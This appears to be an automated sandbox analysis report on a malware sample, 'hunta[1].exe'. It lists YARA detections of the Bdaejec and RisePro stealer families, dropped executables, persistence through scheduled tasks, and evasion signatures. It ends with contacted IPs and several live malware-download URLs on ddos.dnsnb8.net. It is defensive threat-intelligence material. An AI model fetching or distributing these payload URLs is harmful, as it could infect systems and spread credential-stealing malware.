Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR
Yara detected RisePro Stealer
Source: Yara match File source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR
Yara detected RisePro Stealer
Source: Yara match File source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480972 Sample: hunta[1].exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 55 ddos.dnsnb8.net 2->55 61 Antivirus detection for URL or domain 2->61 63 Antivirus detection for dropped file 2->63 65 Antivirus / Scanner detection for submitted sample 2->65 67 9 other signatures 2->67 9 hunta[1].exe 1 10 2->9         started        14 RageMP131.exe 2 2->14         started        16 MPGPH131.exe 2 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 59 193.233.132.62, 49709, 49713, 49714 FREE-NET-ASFREEnetEU Russian Federation 9->59 47 C:\Users\user\AppData\Local\...\WwKLWFk.exe, PE32 9->47 dropped 49 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 9->49 dropped 51 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 9->51 dropped 53 2 other malicious files 9->53 dropped 77 Detected unpacking (changes PE section rights) 9->77 79 Found stalling execution ending in API Sleep call 9->79 81 Uses schtasks.exe or at.exe to add and modify task schedules 9->81 99 2 other signatures 9->99 20 WwKLWFk.exe 18 9->20         started        25 schtasks.exe 1 9->25         started        27 schtasks.exe 1 9->27         started        83 Antivirus detection for dropped file 14->83 85 Multi AV Scanner detection for dropped file 14->85 87 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->87 29 WwKLWFk.exe 1 27 14->29         started        89 Machine Learning detection for dropped file 16->89 91 Tries to evade debugger and weak emulator (self modifying code) 16->91 93 Hides threads from debuggers 16->93 95 Tries to detect sandboxes / dynamic malware analysis system (registry check) 18->95 97 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->97 file6 signatures7 process8 dnsIp9 57 ddos.dnsnb8.net 44.221.84.105, 49707, 49708, 49710 AMAZON-AESUS United States 20->57 41 C:\Program Files\7-Zip\Uninstall.exe, PE32 20->41 dropped 43 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 20->43 dropped 45 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 20->45 dropped 69 Antivirus detection for dropped file 20->69 71 Multi AV Scanner detection for dropped file 20->71 73 Detected unpacking (changes PE section rights) 20->73 75 2 other signatures 20->75 31 WerFault.exe 19 16 20->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 cmd.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 37->39         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
44.221.84.105
 ddos.dnsnb8.net United States
14618 AMAZON-AESUS false
193.233.132.62
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false

Contacted Domains

Name IP Active
ddos.dnsnb8.net 44.221.84.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar true
  • Avira URL Cloud: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k2.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k5.rar false
  • Avira URL Cloud: phishing
 unknown
http://ddos.dnsnb8.net:799/cj//k1.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k4.rar false
  • Avira URL Cloud: malware
 unknown